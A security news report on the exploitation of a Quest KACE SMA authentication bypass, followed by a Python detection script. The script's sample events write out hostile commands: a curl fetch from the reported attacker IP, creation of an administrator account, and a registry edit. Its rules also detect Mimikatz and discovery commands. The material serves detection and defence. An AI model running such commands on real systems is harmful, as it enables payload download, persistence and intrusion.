Arctic Wolf says that threat actors may be exploiting a serious security hole in the Quest KACE Systems Management Appliance (SMA). The cybersecurity company said that starting the week of March 9, 2026, it observed malicious activity in customer environments consistent with CVE-2025-32975 being exploited on unpatched, internet-facing SMA systems.
The ultimate goals of the attacks are not yet known. CVE-2025-32975 (CVSS score: 10.0) is an authentication bypass that lets attackers impersonate legitimate users without valid credentials. Successful exploitation could give an attacker full control of all administrative accounts. Quest patched the flaw in May 2025.
According to Arctic Wolf, the threat actors used the vulnerability to take over administrative accounts and run remote commands that fetched Base64-encoded payloads from an external server (216.126.225[.]156) using the curl command. The then-unidentified attackers also used "runkbot.exe," a background process shipped with the SMA Agent for running scripts and managing installations, to create additional administrative accounts. A PowerShell script also modified the Windows Registry, possibly to alter the system configuration or to persist the changes.
Other observed activity included credential theft with Mimikatz; discovery and reconnaissance by enumerating logged-in users and administrator accounts and running the "net time" and "net group" commands; and remote desktop protocol (RDP) access to backup infrastructure (Veeam, Veritas) and domain controllers.

To protect against the threat, administrators should apply the latest updates and keep SMA instances off the internet. The vulnerability is fixed in versions 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4).
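As an added example that is not part of Arctic Wolf's report or of Quest's own tooling, the following Python triages process-creation events against the activity described above: account creation through runkbot.exe, curl retrieval from the reported IP, PowerShell registry changes launched by the agent, Mimikatz, and net time / net group discovery. The event field names (parent, image, cmdline) and the sample events are constructed assumptions, not real telemetry.

```python
import re

# Indicator from the report, kept defanged in source and refanged only for matching.
REPORTED_IP = "216.126.225[.]156".replace("[.]", ".")

# Each rule: (name, predicate over a process-creation event).
# Events are dicts with assumed fields 'parent', 'image' and 'cmdline'.
RULES = [
    # SMA Agent helper spawning local account / admin group additions.
    ("sma_agent_account_creation",
     lambda e: e["parent"].lower() == "runkbot.exe"
     and re.search(r"\bnet1?\s+(user|localgroup)\b.*\s/add\b", e["cmdline"], re.I)),
    # curl fetching anything from the server named in the report.
    ("payload_fetch_from_reported_ip",
     lambda e: "curl" in e["image"].lower() and REPORTED_IP in e["cmdline"]),
    # Credential-theft tool by image or command-line name.
    ("credential_theft_tool",
     lambda e: "mimikatz" in (e["image"] + " " + e["cmdline"]).lower()),
    # Domain discovery commands seen in the intrusion.
    ("ad_discovery_commands",
     lambda e: re.search(r"\bnet\s+(time|group)\b", e["cmdline"], re.I)),
    # PowerShell registry edits launched from the SMA Agent process.
    ("powershell_registry_change_from_sma_agent",
     lambda e: e["parent"].lower() == "runkbot.exe"
     and "powershell" in e["image"].lower()
     and re.search(r"Set-ItemProperty|New-ItemProperty|\breg(\.exe)?\s+add\b", e["cmdline"], re.I)),
]

def triage(events):
    """Return [(event_index, rule_name), ...] for every rule each event trips."""
    hits = []
    for i, e in enumerate(events):
        for name, pred in RULES:
            if pred(e):
                hits.append((i, name))
    return hits

# Constructed sample events modelled on the reported activity (placeholders, not real data).
SAMPLE_EVENTS = [
    {"parent": "runkbot.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c net user helpdesk2 <redacted> /add && net localgroup administrators helpdesk2 /add"},
    {"parent": "runkbot.exe", "image": "curl.exe",
     "cmdline": f"curl.exe -s http://{REPORTED_IP}/stage.txt -o C:\\Windows\\Temp\\stage.txt"},
    {"parent": "runkbot.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Set-ItemProperty -Path HKLM:\\SOFTWARE\\<placeholder-key> -Name Cfg -Value 1"},
    {"parent": "cmd.exe", "image": "mimikatz.exe", "cmdline": "mimikatz.exe"},
    {"parent": "cmd.exe", "image": "net.exe", "cmdline": 'net group "Domain Admins" /domain'},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},  # benign
]

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Feed real process-creation telemetry (for example Sysmon event ID 1 or EDR process events) into triage in the same dict shape; the benign last event shows that ordinary activity produces no hits.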